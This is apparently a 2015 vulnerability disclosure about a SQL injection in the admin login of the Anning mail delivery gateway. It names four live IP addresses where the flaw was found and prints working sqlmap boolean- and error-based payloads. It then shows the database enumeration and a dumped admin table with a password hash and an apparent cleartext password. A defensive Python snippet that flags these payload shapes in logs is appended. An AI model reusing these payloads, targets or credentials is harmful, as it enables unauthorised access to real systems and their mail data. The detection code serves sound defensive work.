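2015-03-11: Details reported to the vendor; awaiting vendor handling
2015-03-16: Vendor has confirmed; details disclosed only to the vendor
2015-03-19: Details opened to third-party security partners
2015-05-10: Details disclosed to core white hats and experts in related fields
2015-05-20: Details disclosed to regular white hats
2015-05-30: Details disclosed to trainee white hats
2015-06-14: Details disclosed to the public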
As per the title.
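Company homepage: http://www.anymacro.com/index.htm
The login form of the 安宁 (Anning) mail delivery gateway system has a POST SQL injection in the parameter admin. Affected addresses: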
https://115.25.86.234/
https://115.25.86.236/
https://115.25.86.233/
https://115.25.86.235/
I could not crack the admin password; I only logged in as anytest.
sqlmap identified the following injection points with a total of 198 HTTP(s) requests:
---
Parameter: admin (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: admin=admim' RLIKE (SELECT (CASE WHEN (3036=3036) THEN 0x61646d696d ELSE 0x28 END)) AND 'gZTf'='gZTf&btn.x=66&btn.y=29&password=asd

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: admin=admim' AND (SELECT 4088 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (CASE WHEN (4088=4088) THEN 1 ELSE 0 END)),0x71766b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nwwQ'='nwwQ&btn.x=66&btn.y=29&password=asd
---
web application technology: Apache
back-end DBMS: MySQL 5.0

Database: deliver
[13 tables]
+---------------------------------------+
| domain                                |
| user                                  |
| admin                                 |
| config                                |
| defer                                 |
| deliverlog                            |
| erruser                               |
| eventlog                              |
| ipdata                                |
| mailserver                            |
| proclog                               |
| queue                                 |
| total                                 |
+---------------------------------------+

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

Database: deliver
Table: admin
[8 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| date     | datetime         |
| no       | int(11) unsigned |
| admin    | varchar(64)      |
| descp    | varchar(100)     |
| disabled | char(2)          |
| flag     | char(2)          |
| ip       | varchar(100)     |
| passwd   | varchar(32)      |
+----------+------------------+

Database: deliver
Table: admin
[2 entries]
+---------+----------------------------------+
| admin   | passwd                           |
+---------+----------------------------------+
| admin   | $1$655765$t1uDwWFXaeykAb0zQtlLm/ |
| anytest | anb1arfj9f85U                    |
+---------+----------------------------------+
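One way to flag the two payload shapes from the sqlmap output in logged login POST bodies, as an added example (not part of the original report and not the vendor's code). The signature names, function names and sample records are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode

# Signatures derived from the two payload shapes in the sqlmap output above.
SIGNATURES = {
    "quote-breakout": re.compile(r"'\s*(?:AND|OR|RLIKE|UNION)\b", re.I),
    "boolean-case": re.compile(r"\(\s*SELECT\s*\(\s*CASE\s+WHEN\b", re.I),
    "error-based-rand": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "schema-reference": re.compile(r"\bINFORMATION_SCHEMA\b", re.I),
}


def inspect_login_body(body, field="admin"):
    """Decode a form-encoded POST body and return the sorted names of the
    signatures that match any value of `field`."""
    values = parse_qs(body, keep_blank_values=True).get(field, [])
    return sorted({name for v in values
                   for name, rx in SIGNATURES.items() if rx.search(v)})


def scan(records):
    """Return (source, hits) for every (source, body) record that matched."""
    return [(src, hits) for src, body in records
            if (hits := inspect_login_body(body))]


# The two request bodies printed in the sqlmap output above.
BOOLEAN = ("admin=admim' RLIKE (SELECT (CASE WHEN (3036=3036) THEN 0x61646d696d "
           "ELSE 0x28 END)) AND 'gZTf'='gZTf&btn.x=66&btn.y=29&password=asd")
ERROR = ("admin=admim' AND (SELECT 4088 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,"
         "(SELECT (CASE WHEN (4088=4088) THEN 1 ELSE 0 END)),0x71766b6b71,"
         "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) "
         "AND 'nwwQ'='nwwQ&btn.x=66&btn.y=29&password=asd")
# Constructed samples: an ordinary login, and the first body percent-encoded
# the way it travels on the wire (matching happens after decoding).
NORMAL = "admin=anytest&btn.x=66&btn.y=29&password=asd"
ENCODED = urlencode(parse_qs(BOOLEAN), doseq=True)

# Constructed log records: (source address, POST body); the addresses are
# documentation ranges, not values from the report.
RECORDS = [("192.0.2.10", NORMAL), ("198.51.100.7", BOOLEAN),
           ("198.51.100.7", ERROR), ("203.0.113.5", ENCODED)]

if __name__ == "__main__":
    for src, hits in scan(RECORDS):
        print(src, ", ".join(hits))
```

Matching like this only surfaces probing in logs; the injection itself is closed by binding the admin value as a query parameter instead of concatenating it into the SQL.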
Contact the vendor.
Severity: High
Vulnerability Rank: 11
Confirmation time: 2015-03-16 13:10
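CNVD has confirmed and reproduced the situation described, and has notified the website's managing organization (the software vendor) through the contact details published on the website (or through previously established handling channels).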
None yet.